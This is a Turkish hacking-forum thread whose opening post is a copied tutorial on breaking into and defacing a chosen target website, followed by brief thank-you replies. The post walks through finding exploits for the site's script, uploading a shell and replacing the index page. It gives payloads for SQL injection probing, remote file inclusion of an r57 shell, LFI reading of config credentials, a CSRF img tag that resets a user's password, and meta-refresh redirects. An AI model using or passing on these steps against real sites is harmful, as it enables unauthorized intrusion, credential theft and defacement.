THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Hedef Site Hackleme

black real - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
908
Konular:
132
Teşekkür (Etti):
64
Teşekkür (Aldı):
99
Ticaret:
(0) %
26-10-2013 12:04
#1
Hedef Site Hackleme
Hedef Site Hackleme
İlk olarak şunu belirteyim ; programla hack olmaz hele hedef site hiç olmaz...

Ben bunu Acunetixle yada bilmemne tarayıcısı ile taradım, şunu bunu buldu aha hackliyeceğim diye bir şey yoktur. Bu şekilde hack yapamazsın!

Şimdi diyorsunuzdur ki içinizden : Eee nediyor bu adam böyle nasıl tarıyacaz, program olmadan.

Program olmadan hack nasıl yapacağız ?

Manual yni elle tarıyacağız...En iyi tarama yöntemi budur. Hatta tek iyi tarama yöntemi...

Doğru yapıldığı taktirde hacklemeniz garantidir... Tabii ki bir ihtimal olmayabilir.

En azından programların size verdiği gereksiz ve saçma log dosyalarından kurtulmuş olacağız...

Şimdi Öncelikle Hedef Sitemizi Tanımamız Gerekiyor

-Hangi Dilde Yazılmış? : Php,Asp,Html...

-Özel Bir Scripti Varmı? Vbulletin,mybb...

-Kurumsal Yada Öteki Piyasada Bulunan Scriptlerden Birine mi Ait? Kişisel ve Firimasal Scriptler, Yahut diğer Scriptler...

__________________________________________________

EĞER SCRİPTİNİ BULDUYSANIZ ŞİMDİ O SCRİPTTE DAHA ÖNCEDEN BULUNMUŞ AÇIK VARMI ONA BAKALIM

Bunu öğrenmek için şu sitelerden script adını taratınız

Exploits Database by Offensive Security

En ünlü ve en ilgi gören exploit siteleri bunlardır... bunların dışında Başka Sitelerde de taratabilirsiniz. Ama Öncelikli tercih 1337. Arattık ve Açık

bulduk diyelim... Panele daldıktan sonra yapacaklarımız Neler? Napıcaz? oturup bekliyecek halimiz yok tabii ki...

-Exploitimizi kullanıp Admin paneline dalıyoruz.

-Shell upload ediyoruz.

-İndeximizi basıyoruz.

SHELL UPLOAD OLMUYORMU?

Hacklediğiniz bir siteye yönlendirerekindexin orda görünmesini sağlarız... Nasılmı Aşşağıdaki kodu ana sayfadaki bir dökümana herhangi ekliyerek

<m et a http-enquiv="re fre sh" c ontent="5;URL=http://www.yonlendireceksite.com

5 Beş sayısını azaltıp artırabilirsiniz bu saniye ayarıdır.
__________________________________________________

ARIYACAĞIMIZ MUHTEMEL AÇIKLAR;

Muhtemel Açıklar : SQL bugs, XSS bugs, XRSF-CSRF bugs, Lfi bugs, Html injection bugs, Upload bugs, Rfi bugs.

Bugs ve Admin zekasına yönelik açıklar (yani SM çekicez)

SONRA XSS AÇIKLARINI TARAYALIM

Sql bugs olması için öncelikle sitede id değerinin bulunması gerekir.

Şu Şekilde Yani :

.php?id=

.asp?id=

.aspx?id=

Bunlar gibi ID değeri varsa SQL açığı olabilir Açık olup olmadığını anlamak için ID değerinin sonuna " işareti koyup enterliyoruz Eğere site hata

veriyorsa Açık vardır. Bundan sonra manual veya havij ile yapılabilir.

Panele daldık nemi yapacağız.

Yukarda Anlatmıştım...

Video İle yapmak

Manual:
Kod: (Tümünü Seç)
SQL Injection Manual - by The_Gruchen - YouTube
Havij:
Kod:
http://www.youtube.com/watch?v=MqLBj0Io8V8
RFI AÇIKLARINI TARAYALIM

Günümüzde nerdeyse hiç rastlamadığımız rfi açıkları artık ölü bir açık haline gelmiştir...

Nadir olsada bazı sitelerde rastlıyabiliyoruz...ID değerli yada include.php türü bir dosya lazım bize... Uzaktan dosya dahil edeceğimiz serverimize bu

şekilde... Misal bir Shell kodu olabilir bu. Peki nasıl mı yapacağız
http://hedefsite.com/include.php=Htt.../r57shell.txt?
"?" mutlaka bulunmalıdır.

Açık varsa karşımıza çıkacaktır... Bizde indeximizi basarız...
Kod:
http://www.youtube.com/watch?v=iHo51gVwAkI
LFI AÇIKLARINI TARAYALIM

LFI da artık karşımıza az çıkmaya başlayan bir açıktır... Pek etkili bir açık değildir aslında ama uğruna hedef siteye denemeye değer...

Bu açık sayesinde serverdeki bir dosyayı okuyabilsiniz...

Misal configuration.php yi okursanınz database şifresi , FTP şifresi gibi kritik bilgilere ulaşıp bağlantıyı kurup indexinizi basabilirsiniz.
Kod:
http://www.youtube.com/watch?v=_uqEZM2KyNw
CSRF-XRSF AÇIKLARINI TARAYALIM

CSRF-XRSF Browserlerin ************ çalıştırma desteği ile kişilere isteğinin dışında servere komut yollamasını sağlıyan kodlardır.

Bu açıklara

ÇOK RASTLARIZ. EN BÜYÜK SİSTEMLERDE DAHİ Gmailde vardı ama fixlendi...

Misal :
Kod:
http://www.hedefsite.com/management/change_password.php?new_pass=Kibrit
iz bunu bildiğimiz için bundan yararlanıcaz. Zaten amacımızda bu işlemlerimizi gerçekleştirebilecek kişiler oturum açmış durumdayken kullanarak

onlar yerine kendi kodlarımızı güvenilir kodlarmış gibi kullanıcıyı kullanarak gösterektir.

Ve bu saldırıları html veya ************ kullanara işlemesini sağlayabiliriz.

<img scr="http://hedefsite.com/management/change_password.php?new_pass=Kibrit&verify_pass=Ki brit&submited=1">

Örnek linke tıkladığımızda user, Eğer sitede oturum açmış durumda ise şifresini kibrit olmasını sağladık. Sonra yönetici girişi yapıp indeximizi

basabiliriz...

CSRF :
Kod:
http://www.youtube.com/watch?v=UJv0zHNuUr4
XRSF : Bulamadım

-----------------------------------------------------------------------

UPLOAD AÇIKLARINI TARIYALIM

Upload açıklarının yollarını bulmak zordur fakat rastlamak o kadar zor değildir.

Yani demek istediğim upload açıklarını ararsanız çok zor bulursunuz, Ancak o sizi tesadüfen bulur...

Muhtemel upload açıklı dosya yolları

-upload.php

-uploadimg.php

-uploader.php

Bu yollara başvurarak siteye Shell upload edip indexinizi basabilirsiniz...
Kod:
http://www.youtube.com/watch?v=HIKo4i8CsII
HTML İNJECTİON AÇIKLARINI TARIYALIM

Sitelerde yorum ekleme yeri varsa html injenction olabilir... Ara sıra karşımıza çıkabilir denemekte fayda var

Me t a kodunu yorum başlığı kısmına yapıştırıp yönlendirebilirsiniz...

<m et a http-enquiv="ref re sh" con te nt="5;URL=http://www.hedefsite.com">

İşi garantiye almak istiyorsanız tüm satıra m e ta kodunu yapıştırabilirsiniz
Kod:
http://www.youtube.com/watch?v=XAoEtVejYwA
[/COLOR]
Not: tamamen alıntıdır
--------------------- Hepiniz birer Türk Bayrağı'sınız. Bayrağı lekelemeyin, kirletmeyin yere düşürmeyin
Konu black real tarafından (22-12-2013 16:24 Saat 16:24 ) değiştirilmiştir.
BySeRSeRiTR, cemq566 Teşekkür etti.
STR-Key - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
BÖRTEÇİNE
Mesajlar:
3.187
Konular:
699
Teşekkür (Etti):
262
Teşekkür (Aldı):
969
Ticaret:
(0) %
26-10-2013 12:18
#2
Defalarca Paylaşildi Ama Ellerine Saglik
--------------------- Bir Sistemin Nasıl Çalıstıgını Bilmiyorsan o Sisteme giremezsin yada koruyamazsın..
Türk Irkı Sağ Olsun
Tanrı Türkü Korusun
cemq566 Teşekkür etti.
marze - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
Antalya
Mesajlar:
906
Konular:
79
Teşekkür (Etti):
27
Teşekkür (Aldı):
99
Ticaret:
(0) %
26-10-2013 12:18
#3
internette bin tane var belki ama birde bizde olsun sıkıntı yok mausenin sağ tuşuna sağlık kardeşim
--------------------- VERDİĞİM CEVAB İŞİNE YARADIYSA TEŞEKKÜR BUTONUNA BASMAN YETERLİ
GÖZÜMÜN İYİ GÖRDÜĞÜNÜDE ÖĞRETTİ BİRİSİ
UÇAKTAN UÇAĞA ATLARKEN JARJÖR DEĞİŞTİRMESİ ZOR OLUYOR BEEE
black real - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
908
Konular:
132
Teşekkür (Etti):
64
Teşekkür (Aldı):
99
Ticaret:
(0) %
26-10-2013 12:18
#4
Alıntı:
alpcan99´isimli üyeden Alıntı Mesajı göster
Defalarca Paylaşildi Ama Ellerine Saglik
foruma arada sırada gırıyodum gormedım paylasıldını oozur dılerım.
--------------------- Hepiniz birer Türk Bayrağı'sınız. Bayrağı lekelemeyin, kirletmeyin yere düşürmeyin
black real - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
908
Konular:
132
Teşekkür (Etti):
64
Teşekkür (Aldı):
99
Ticaret:
(0) %
26-10-2013 12:20
#5
Alıntı:
marze´isimli üyeden Alıntı Mesajı göster
internette bin tane var belki ama birde bizde olsun sıkıntı yok mausenin sağ tuşuna sağlık kardeşim
eywallah
--------------------- Hepiniz birer Türk Bayrağı'sınız. Bayrağı lekelemeyin, kirletmeyin yere düşürmeyin
drhackertr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
konsey
Mesajlar:
301
Konular:
42
Teşekkür (Etti):
36
Teşekkür (Aldı):
21
Ticaret:
(0) %
26-10-2013 12:23
#6
Bilgi İçin Teşekkürler
---------------------

Bizi Susturmaya Çalışmayın Kan Kusarsiniz.... !!!
black real - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
908
Konular:
132
Teşekkür (Etti):
64
Teşekkür (Aldı):
99
Ticaret:
(0) %
26-10-2013 12:24
#7
Alıntı:
drhackertr´isimli üyeden Alıntı Mesajı göster
Bilgi İçin Teşekkürler
rica ederim
--------------------- Hepiniz birer Türk Bayrağı'sınız. Bayrağı lekelemeyin, kirletmeyin yere düşürmeyin
black real - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
908
Konular:
132
Teşekkür (Etti):
64
Teşekkür (Aldı):
99
Ticaret:
(0) %
26-10-2013 13:53
#8
güncel/
--------------------- Hepiniz birer Türk Bayrağı'sınız. Bayrağı lekelemeyin, kirletmeyin yere düşürmeyin
black real - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
908
Konular:
132
Teşekkür (Etti):
64
Teşekkür (Aldı):
99
Ticaret:
(0) %
26-10-2013 14:03
#9
Alıntı:
therapiz´isimli üyeden Alıntı Mesajı göster
Aynısını bende paylaştım konumu banladılar..Bide sildiler..+++Konu çöp+kilit++
Sikayet et ozaman
--------------------- Hepiniz birer Türk Bayrağı'sınız. Bayrağı lekelemeyin, kirletmeyin yere düşürmeyin
black real - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Mesajlar:
908
Konular:
132
Teşekkür (Etti):
64
Teşekkür (Aldı):
99
Ticaret:
(0) %
26-10-2013 14:06
#10
Alıntı:
therapiz´isimli üyeden Alıntı Mesajı göster
Ettimm zaten
Bakalım nolacak merak etım
--------------------- Hepiniz birer Türk Bayrağı'sınız. Bayrağı lekelemeyin, kirletmeyin yere düşürmeyin

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler